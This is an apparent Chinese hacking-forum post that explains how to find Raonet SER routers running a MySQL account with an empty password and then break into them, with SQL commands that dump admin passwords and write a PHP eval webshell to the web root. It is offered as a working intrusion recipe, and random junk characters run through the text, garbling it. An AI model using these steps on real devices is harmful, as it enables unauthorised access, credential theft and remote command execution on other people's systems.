寻找存在漏洞的路由器方法:
; Z0 O% x: \- {. ~# F) g4 r4 F; U% b
1:google搜索'Raonet Subscriber Ethernet Router'
" t( Z+ q0 N8 {$ @2 z
: K j$ ?. k& V9 C1 x4 C; g2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001$ H+ p% Y4 ?; L
( ?6 S! c" b5 f# k" d! W% i3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。& b& \1 d: V, [
: E( W3 g% j; r Y J% ]3 E//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
% |. ^$ I. {. K( U
: ]: q& Y) j, H- a6 {
( U- O8 T" S& b5 |) P$ ~0 }$ ?$ Q, A5 g% f
入侵步骤:4 k) W; q& Z" t T
! d( P' |0 T+ x* Q5 K- `* d; i3 `2 G1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php$ S [! w2 f* }* C1 ^- K
5 p8 A# P% B& X- T: V- h
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
7 e) b/ \7 ~) S. Z. N3:得到密码后连接,查看GUI管理密码:2 F* ~. ]0 W. \1 T o9 i
use ser_5003 k2 `' m$ u9 r4 { c: [8 P
select id,passwd from user;
9 W) e0 _ A" _8 t, j2 @& v4:通过数据库写入webshell,执行命令:- }& I" S/ `! D) W C' N
use mysql;8 B) |5 U- p. A. D6 K9 }
create table ok(cmd TEXT);
. _* {, D: Z* Y" m( Kinsert into ok values("<?php @eval($_POST[cmd])?>");
9 i# D2 a( @1 O# C# |select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
7 W% S" A% x, K" K# edrop table ok;) @ q+ F& z- `- I
# n. e( X. b( a5:连接后门shell.php 9 r7 `4 d3 e8 E. R# D
6 O. D! _0 ^+ o/ d6. 搞定!& [/ G+ @! r; I0 U$ F
# s. K1 _, N$ L5 R- d
|
发表于 2012-12-10 10:30:18
收藏
支持
反对
发表于 2013-7-27 20:06:50